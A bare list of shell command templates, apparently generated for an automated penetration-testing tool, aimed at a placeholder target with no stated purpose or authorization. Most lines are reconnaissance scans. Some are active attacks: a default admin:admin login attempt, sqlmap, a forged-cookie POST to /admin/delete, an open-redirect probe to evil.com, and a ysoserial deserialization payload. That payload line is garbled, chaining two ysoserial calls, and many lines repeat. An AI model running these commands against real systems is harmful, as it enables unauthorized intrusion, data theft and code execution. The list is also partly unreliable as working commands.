f"nmap -Pn --script vuln {target}"
f"sublist3r -d {target}"
f"curl -I {target}"
f"sslscan {target}"
f"theHarvester -d {target} -b all"
f"whatweb {target}"
f"dnsrecon -d {target}"
f"testssl {target}"
f"curl {target}/robots.txt"
f"curl -I {target}"
f"enum4linux {target}"
f"nikto -h {target}"
f"nmap -Pn --script vuln {target}"
f"theHarvester -d {target} -l 100 -b google"
f"testssl {target}"
f"curl -H 'Origin: evil.com' -I {target}"
f"curl -u admin:admin {target}"
f"curl {target}/logs/access.log"
f"nmap -Pn --script vuln {target}"
f"sqlmap -u {target}"
f"curl -X GET {target}/api/endpoint"
f"nmap -Pn --script vuln {target}"
f"curl -I {target}"
f"ysoserial CommonsCollections5 'curl -s http://{target}' | java -jar ysoserial.jar ROME | base64 -w0 | xargs -i curl -X POST -d '{{\"name\":\"{{}}\"}}' http://{target}/api/v1/deserialize"
f"curl -I {target}"
f"nmap -Pn --script vuln {target}"
f"curl -I {target}"
f"nmap -Pn --script vuln {target}"
f"curl -I {target}/third_party_app"
f"curl -X POST -H 'Cookie: session=evil' {target}/admin/delete"
f"curl -I {target}/redirect?url=http://evil.com"
f"theHarvester -d {target} -l 100 -b all"